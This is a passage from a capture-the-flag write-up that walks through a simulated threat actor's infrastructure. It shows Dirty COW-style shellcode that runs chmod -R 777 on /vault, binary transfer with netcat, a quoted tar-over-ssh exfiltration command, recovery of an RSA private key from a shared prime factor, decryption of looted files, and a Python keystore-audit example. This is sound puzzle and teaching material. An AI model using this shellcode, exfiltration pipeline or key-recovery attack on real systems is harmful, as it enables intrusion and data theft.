  0xbf, 0xe9, 0x03, 0x00, 0x00, 0x48, 0x89, 0xfe, 0x6a, 0x75, 0x58, 0x0f,
  0x05, 0xbf, 0xe9, 0x03, 0x00, 0x00, 0x48, 0x89, 0xfe, 0x48, 0x89, 0xf2,
  0x6a, 0x71, 0x58, 0x0f, 0x05, 0xbf, 0xe9, 0x03, 0x00, 0x00, 0x6a, 0x69,
  0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69,
  0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63,
  0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x19, 0x00, 0x00, 0x00, 0x2f,
  0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2d, 0x52,
  0x20, 0x37, 0x37, 0x37, 0x20, 0x2f, 0x76, 0x61, 0x75, 0x6c, 0x74, 0x00,
  0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 223;

Quickly compiled the binary and transferred it to the server:

$ musl-gcc -pthread -static cowchmod.c -o haxxit
$ cat haxxit | nc cloud-c2-70 1447
$

Beforehand I had started a netcat listener on the cloud-c2-70 server:

$ nc -l -p 1447 > haxxit &
$ chmod +x haxxit
$ ./haxxit
$ ls -l
total 12464
-rwxrwxrwx    1 vault    users         2063 Mar  2 20:25 FLAG
-rwxrwxrwx    1 vault    users           32 Jan 16 10:24 key
-rwxrwxrwx    1 vault    users           39 Feb 11 23:32 seq.0000.zavzlqdyoakhcdqzacqdiamtytleoljooepzwuzlwluyokxppnsxpgqobbuppdfd
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0000.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0001.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0002.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0003.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0004.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0005.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0006.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
.....
-rwxrwxrwx    1 vault    users        33071 Feb 11 22:45 seq.00c2.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuh

Here we see the FLAG, the key/access token used by lootd for downloading files, and all the encrypted exfiltrated data.
For reference, the key used by lootd is the md5sum of the word sandworm.

$ cat FLAG
                                           ╭──────────────────────────────────╮
             _ +s,                         │ 6bf3b4927c0dc259da32c033c8212449 │
             +:<nl:..:;;;.                 ╰───────────────────────────╮ FLAG │
        ._>=|||=+=;:;;;:-                                              ╰──────╯
   .__au2"==::|+++=:.::
 .%?X##c:;==+|==+=;;:::;:
 :lvX22n=+=|<i=+==;====;::           . .                       ._,,__.
  -+||||lIIYSSXos;:;;;;;:   _uqmmo .==;=;;;::::::::::::.   ._aamQQQQmmmwos.
           --~+Ivoi:-.- .<wmmWWWWC ==++========;:;:;::::.<qmWmZ!""!?9HQQQZo,
               -ivvnnaaadmmmWWWWQQa;++|||+|++==;;::----_wmmmmm;       -"4#mc
                -~+Ivnn2XZ#BWWWWWWmWo=+++|++==- ._aaamQQBm##Z#ma,.::..   )XX;
                    ~"InoXU##?!?$m#ZX;==+==;-.swQQQWWWWmm#ZZZU#mQm,     .%XX>
                   .  :vnoXZ'   -3UZXc.----.umWWWWWWBm##ZZXXXZ#mWWQwsssuZXSS(
                    . .ivnXX,    -XZXXos_aammmmmmmm##ZZXXXSSXZ#mWmW###Z#ZXoS`
                       -<IvXXa.  )#ZZXXX#XZZZ#Z#ZZXXXS22onnoXZmmBmm###ZZXe{2
                         <ivnXmuq#ZZZXXX2S2S2SoSo22oonnnvIvnoSX#UUZZZZZX2`)e
                          +iv2X###UXYIvIvvvIIvIvvvvvvIli||||In2SSSXXXZZX( =e
                            -nXU##Xl+|i=--~~++++|+||illvvvIvIiIIno2SSXZXz =|
                             =n##UX>=iii.           -+vvvvvnvnvilIooSXZmmc.-
                             :dmWWm>|i|ii             -~ilvvvIIli|iInXZ##G>:.
                              {#W#2`~lvvv=             .|+-~|>+<|||=-{XSS2(;=;
                              =mZZ(   <nnn;                 --.ivi>-  <oXX;-==.
                             _wmB#(   <o2on;                 .voon=   <dmmc -:.
                           ._d##8S'  <non1>`               .<uoon}`  .3Z#We
                           =!*11~   :++||+                 :++{}`   _IY2n+
                                                             .      --- -

To decrypt the data and get the next flag we need to gain access to the cloud-hq-42 server.

loot the easy way

The easiest way to read this flag is to make a simple symlink and read the flag with moveloot!

$ ln -s /vault/loot/FLAG .
$ /usr/sbin/moveloot -f FLAG
                                           ╭──────────────────────────────────╮
             _ +s,                         │ 6bf3b4927c0dc259da32c033c8212449 │
             +:<nl:..:;;;.                 ╰───────────────────────────╮ FLAG │
        ._>=|||=+=;:;;;:-                                              ╰──────╯
   .__au2"==::|+++=:.::
 .%?X##c:;==+|==+=;;:::;:
 :lvX22n=+=|<i=+==;====;::           . .                       ._,,__.
  -+||||lIIYSSXos;:;;;;;:   _uqmmo .==;=;;;::::::::::::.   ._aamQQQQmmmwos.
           --~+Ivoi:-.- .<wmmWWWWC ==++========;:;:;::::.<qmWmZ!""!?9HQQQZo,
               -ivvnnaaadmmmWWWWQQa;++|||+|++==;;::----_wmmmmm;       -"4#mc
                -~+Ivnn2XZ#BWWWWWWmWo=+++|++==- ._aaamQQBm##Z#ma,.::..   )XX;
                    ~"InoXU##?!?$m#ZX;==+==;-.swQQQWWWWmm#ZZZU#mQm,     .%XX>
                   .  :vnoXZ'   -3UZXc.----.umWWWWWWBm##ZZXXXZ#mWWQwsssuZXSS(
                    . .ivnXX,    -XZXXos_aammmmmmmm##ZZXXXSSXZ#mWmW###Z#ZXoS`
                       -<IvXXa.  )#ZZXXX#XZZZ#Z#ZZXXXS22onnoXZmmBmm###ZZXe{2
                         <ivnXmuq#ZZZXXX2S2S2SoSo22oonnnvIvnoSX#UUZZZZZX2`)e
                          +iv2X###UXYIvIvvvIIvIvvvvvvIli||||In2SSSXXXZZX( =e
                            -nXU##Xl+|i=--~~++++|+||illvvvIvIiIIno2SSXZXz =|
                             =n##UX>=iii.           -+vvvvvnvnvilIooSXZmmc.-
                             :dmWWm>|i|ii             -~ilvvvIIli|iInXZ##G>:.
                              {#W#2`~lvvv=             .|+-~|>+<|||=-{XSS2(;=;
                              =mZZ(   <nnn;                 --.ivi>-  <oXX;-==.
                             _wmB#(   <o2on;                 .voon=   <dmmc -:.
                           ._d##8S'  <non1>`               .<uoon}`  .3Z#We
                           =!*11~   :++||+                 :++{}`   _IY2n+
                                                             .      --- -

This won't, however, help you actually access the loot, since you cannot guess all the encrypted filenames in /vault/loot.

cloud-hq-42

We have only seen this server referenced in the .ash_history of the vault user on the cloud-c2-70 server:

tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport

This server is reachable from the login server over SSH, but we need the oper account's SSH key to log on to it. Luckily for us this network is really insecure, and the SSH public keys we have access to from the keystore are fundamentally flawed.

In addition we have access to one more SSH public key on the cloud-c2-70 server, in /tmp/xxx, since the threat actor failed to delete it (the .ash_history shows rm -rf /tmp/xx rather than /tmp/xxx).

Looking back at the list of SSH keys you will notice two EdDSA keys that stand out. Based on the key comments we can infer that the keys belong to Arjen K. Lenstra and Nadia Heninger. A quick search on these two names leads to Seth David Schoen's page Understanding Common Factor Attacks: An RSA-Cracking Puzzle. This page describes a weakness in RSA keys where the private key can be inferred if you have several public keys whose moduli share a prime.

In our case we have two keys for the oper user, the one from /tmp/xxx and the one labelled oper@cloud-hq-42, whose moduli share a prime, which lets us compute the private key.

I used RsaCtfTool to do the actual attack and key generation for me.

First I converted the SSH public keys to PEM-format RSA public keys:

$ ssh-keygen -e -mpem -f xxx > xxx.pem
$ ssh-keygen -e -mpem -f oper@cloud-hq-42 > oper@cloud-hq-42.pem

Then I could use RsaCtfTool to do the actual attack:

$ RsaCtfTool.py --publickey "keys/*.pem" --private --verbose
[*] Multikey mode using keys: ['keys/xxx.pem', 'keys/oper@cloud-hq-42.pem']
[*] Found common factor in modulus for keys/xxx.pem and keys/oper@cloud-hq-42.pem
-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----

The output order of the keys may vary, so try them both. One of them should give access to oper’s account on cloud-hq-42:
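The common-factor check described above, as an added example that is neither RsaCtfTool nor anything from the write-up: it parses OpenSSH "ssh-rsa" lines directly (no ssh-keygen conversion), gcds every modulus against every other to flag shared primes and reused keys, and confirms that one shared prime is enough to rebuild a working private exponent. The keystore lines, the oper@tmp-xxx comment and the small primes are constructed; real keys are 2048-bit, but the arithmetic is the same.

```python
import base64
import struct
from math import gcd


def _ssh_string(b: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def _mpint(v: int) -> bytes:
    """RFC 4251 'mpint': big-endian, leading zero byte if the high bit is set."""
    raw = v.to_bytes((v.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def encode_ssh_rsa(e: int, n: int, comment: str) -> str:
    """Build an authorized_keys-style 'ssh-rsa <base64> <comment>' line."""
    blob = _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def parse_ssh_rsa(line: str):
    """Return (e, n, comment) from an 'ssh-rsa' line; ValueError otherwise."""
    parts = line.split(None, 2)
    if len(parts) < 2 or parts[0] != "ssh-rsa":
        raise ValueError("not an ssh-rsa key line")
    blob = base64.b64decode(parts[1])
    fields, off = [], 0
    while off + 4 <= len(blob):
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + length])
        off += length
    if off != len(blob) or len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("malformed ssh-rsa blob")
    e = int.from_bytes(fields[1], "big")
    n = int.from_bytes(fields[2], "big")
    return e, n, (parts[2].strip() if len(parts) == 3 else "")


def audit_keystore(lines):
    """Pairwise gcd of every RSA modulus against every other one.
    Returns (shared, duplicates): (comment_a, comment_b, p) triples for moduli
    sharing a prime p, and (comment_a, comment_b) pairs with identical moduli.
    Non-RSA lines such as ssh-ed25519 are skipped."""
    keys = []
    for line in lines:
        try:
            keys.append(parse_ssh_rsa(line))
        except ValueError:
            continue
    shared, duplicates = [], []
    for i in range(len(keys)):
        for j in range(i + 1, len(keys)):
            _, n_a, c_a = keys[i]
            _, n_b, c_b = keys[j]
            if n_a == n_b:
                duplicates.append((c_a, c_b))
            elif (g := gcd(n_a, n_b)) > 1:
                shared.append((c_a, c_b, g))
    return shared, duplicates


def recover_private_exponent(n: int, e: int, p: int) -> int:
    """Given one prime factor p of n, derive the RSA private exponent d."""
    q, rem = divmod(n, p)
    if rem != 0:
        raise ValueError("p does not divide n")
    return pow(e, -1, (p - 1) * (q - 1))  # modular inverse, Python 3.8+


# Constructed keystore (small primes for readability): two moduli share the
# Mersenne prime P, one key is independent, one is a byte-identical duplicate,
# and one ed25519 line shows that non-RSA entries are skipped.
E = 65537
P = 2147483647  # 2**31 - 1
Q1, Q2, Q3, Q4 = 1000000007, 1000000009, 998244353, 2305843009213693951  # last is 2**61 - 1
KEYSTORE = [
    encode_ssh_rsa(E, P * Q1, "oper@cloud-hq-42"),  # comment taken from the write-up
    encode_ssh_rsa(E, P * Q2, "oper@tmp-xxx"),  # hypothetical comment for the /tmp/xxx key
    encode_ssh_rsa(E, Q3 * Q4, "vault@cloud-c2-70"),
    encode_ssh_rsa(E, Q3 * Q4, "vault@cloud-c2-70-dup"),
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTED constructed@localhost",
]


def demo():
    """Run the audit and prove that the shared factor yields a working private key."""
    shared, duplicates = audit_keystore(KEYSTORE)
    _, _, p = shared[0]
    e, n, _ = parse_ssh_rsa(KEYSTORE[0])
    d = recover_private_exponent(n, e, p)
    msg = 123456789
    roundtrip_ok = pow(pow(msg, e, n), d, n) == msg
    return shared, duplicates, roundtrip_ok
```

For a real keystore of a few dozen 2048-bit keys the pairwise loop is fast enough; at scale, batch-GCD is the usual replacement for the double loop.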

$ ssh oper@cloud-hq-42 -i id
╔═══╗─────────────╔╗───╔╗───╔╗
║╔═╗║────────────╔╝╚╗──║║──╔╝╚╗
║║─╚╬══╦═╗╔══╦═╦═╩╗╔╬╗╔╣║╔═╩╗╔╬╦══╦═╗╔══╗
║║─╔╣╔╗║╔╗╣╔╗║╔╣╔╗║║║║║║║║╔╗║║╠╣╔╗║╔╗╣══╣
║╚═╝║╚╝║║║║╚╝║║║╔╗║╚╣╚╝║╚╣╔╗║╚╣║╚╝║║║╠══║
╚═══╩══╩╝╚╩═╗╠╝╚╝╚╩═╩══╩═╩╝╚╩═╩╩══╩╝╚╩══╝
──────────╔═╝║             Great success!
──────────╚══╝
oper@hq ~ > cat FLAG

                              .__s_a%Ivoawwaaaa,______.
                      .__vnowwpmQmmmmmQQQQW#YWW#QQQmZXXoi,.
                ._%sumZsaqmQmc)VUBWWWBHWWP!:sammmQQWWXmWQmga;_
             __wqm##Z?#mWQQWV\awmWQWQgc:-<wQQQQQQWP=sagQWWQQmmga,.
          .ad#UY?nawwaa}?V?<mQQQQQQQQQW=yQQQQQQQUmmQQQQQWQQQQQQQmq,
        _aoe+-<wQQQQWQQQo:aQQQQQQQQQQQ&QQQQQQQWmmWQQQQQQQQQQWQQWQQm,.
      .vmWQB=yQQWWWWWQQQtjQQQQQQQQQQQWmQQQQQQWmQWQQQQZVWWW#YWWQQQQQEna,
    .sa!{WWsmQQQW>:uWWQEvQQQQBmQQQQQWXWQQQQQWXQQQQQQQ#=:<a%=)Y$QQQQ#dWmw,
   .uZ2=mWGdWWWWE<mWQQQoQWQQBSWWQQQW#mWQQWWW#XWQQQWWEomQQQQQQmwdUWQQQQWWma,
   <oXomW#nBWmW#(dWWQQDdQQQWCdWWWWQWXmWQWWWWCdQWQWWmmQQQQQQQQQQmX$QQWW#$Wmm,
  _uXnmmW2dmmm#e<#BWWWXWWWW#{mmWWWW#2WWWQW#ZmWWWWBmmWWQWWWB#QQQWX#QQQQ#3$m#c
 .31nmZ#Z+XZ##Z(]#BWBmXmWmmk<#mmBm#e<X###SXmWmBmmmWWWWWW##Y{XUVY=3QWW#(=umqo, 
 :<dXS22+:SXXZX(3##mmmZmWm#e=XmWmBmmmmwo+)##mBBBmBm##ZXY!vw###mqwwXX"+<XBmm#n;
.=nX22ouoaoXXXS+{###m#####X>:X##mWmmm###m/*XXXXXSY111!`<uZZ#Z#ZmWmWmmms%X###Xs.
=>{2SSXZZZXS2So>+XXU#######X:)1X#ZU#ZXXY}~ ---:;:;=;: _X#UXXXXXXX##mm##X%3#ZZXs
 -:I1oSSSS2S2Son:<XXXZXX2XS1;-=+{(*+}++-:_saawmmqmmmmmw###ZZX2=vXZXZZ#ZX(+nXXXo
 _ :+||{lI11nnnn>:+{**||++--   ----._iawmWmmWmm#ZZ####mm##ZZZ(:{XXXXXXZXs=uS22o
:I|. ----:++illIi:.  -  ._saaas,._ummWBWmBmmm##XXSSSXZZZZZXY|: -|1S2XSSSe|nXo2l
 =:..===;:.:.-~++:.  _aqmmWBWmBWpmmWm###ZZZZZZ2~--++|!!*|"-=saua==+|{o2ol<non>:
   .||=::;=;::.    =w######XX##m###UZ#2+!*S11*:=aowa%,-  .idX#mmmo,:nXX2n;<nns.
    ++=;   ::::. .uS2XXXXXS>{XXXXS1*!+=sssi>==vSXXXSSXos.=voSSXXXZXsIo2onv=il|.
     -=|=;.. .   %vII111*+:..::;:--=<vXXn222o2nnnnnnooSos|vnnnvvnn2nivnvvvli>:
         ---:-. =vvvi;:_<%uS2ooooovnnnnl><vvnnvvI}innnnnvivnvvlivvvn>ivlvli>:-
             .  =i|il|%vnvvvvvnnnvvvvI>~..:=~+~---=<iiiii|illl>;<vvn>=iili+.
               -:::=|llIlIvi.----=--:.=ivl|=;:.     ---::==++=-:<lIvII|:--..
                 .:::=+|||i|==vlvii==||+---               - -  .::+=++~.. -
                    ..:-:::::++-:-:--           :_<vss_i_,       .
                            .                ._|innnno22nnvi|__..
                                .        . ..:|vvoooooonnnvvili+++=
                                - .      ...:=ivnonnnvvvvvvvvvvvi:
╭──────╮                                   ...=|ivvvIIlIlliiii||`
│ FLAG ╰───────────────────────────╮           ---+~+++=-=-=--
│ c7e94612d1ded34c709e23a496ac01c0 │                      .
╰─────────

As seen in the .ash_history on cloud-c2-70 the threat actor ran the command

tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport

to exfiltrate data to this server. Looking at /bin/lootimport we can see that it decrypts the exfiltrated data, and the script reveals the key they are using:

#!/bin/sh
set -ex
d=$(mktemp -d)
tar xz -C $d
#find $d -type f | xargs -n1 cat | crypt0r "precise stallion cell nail" | less

If we copy out /bin/crypt0r we can use it to decrypt the files from /vault/loot on cloud-c2-70. Decrypting them gives us the NIS' unclassified yearly threat report, FOKUS 2020, and the flag for the last mission.

$ cat seq.0000.zavzlqdyoakhcdqzacqdiamtytleoljooepzwuzlwluyokxppnsxpgqobbuppdfd.decrypt
FLAG: 147597090536facfc0873b6e567699ba
$ cat seq*zeicfg*.decrypt >> focus2020.pdf
$ md5sum focus2020.pdf
8728fe7f83d1b0a702b54265081604f0  focus2020.pdf

Fokus 2020

This concludes the mission task, and only the Brainteaser is left.